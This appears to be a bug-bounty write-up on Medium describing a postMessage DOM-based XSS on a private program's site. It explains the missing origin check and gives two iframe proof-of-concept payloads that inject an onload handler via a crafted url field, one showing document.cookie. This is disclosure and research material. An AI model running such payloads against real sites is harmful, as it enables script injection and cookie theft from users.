PostMessage Xss vulnerability on private program

postMessage:

The window.postMessage() method safely enables cross-origin communication between Window objects; e.g., between a page and a pop-up that it spawned, or between a page and an iframe embedded within it.

postMessage xss :

is a dom based xss that is happened when the postMessage is not implemented properly(without origin verification) , and untrusted data received from other host are added to the dom without any filtration

Start :

while i was doing some research on a website of a private program , I got a notification from postMessage-tracker (extension on google chrome which notify you when a postmessage interaction is detected ) .

notification from postMessage tracker
postMessage script
creatFloatingPageElement function
getDataFromEvent function
<script>
function SendMessage() {
var IframeElement = document.getElementById('VulnerableSiteIframe');
var message = {"message":"e:openFloatingPage","data":{
"id":"1234gghq",
"name":"tayba",
"url":"https://www.framable.com\"+onload=alert()"
}};
IframeElement.contentWindow.postMessage(message, '*');
};
<iframe id="VulnerableSiteIframe" height="400" width="1024" src="https://redacted.com/bootstrap.php" onload="SendMessage()"></iframe>
</script>
<script>
function SendMessage() {
var IframeElement = document.getElementById('VulnerableSiteIframe');
var message = {"message":"e:openFloatingPage","data":{
"id":"1234gghq",
"name":"tayba",
"url":"https://www.anything.com\"+onload=alert(document.cookie)"
}};
IframeElement.contentWindow.postMessage(message, '*');
};
<iframe id="VulnerableSiteIframe" height="400" width="1024" src="https://redacted.com/download.php?p=jjjj" onload="SendMessage()"></iframe>
</script>

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store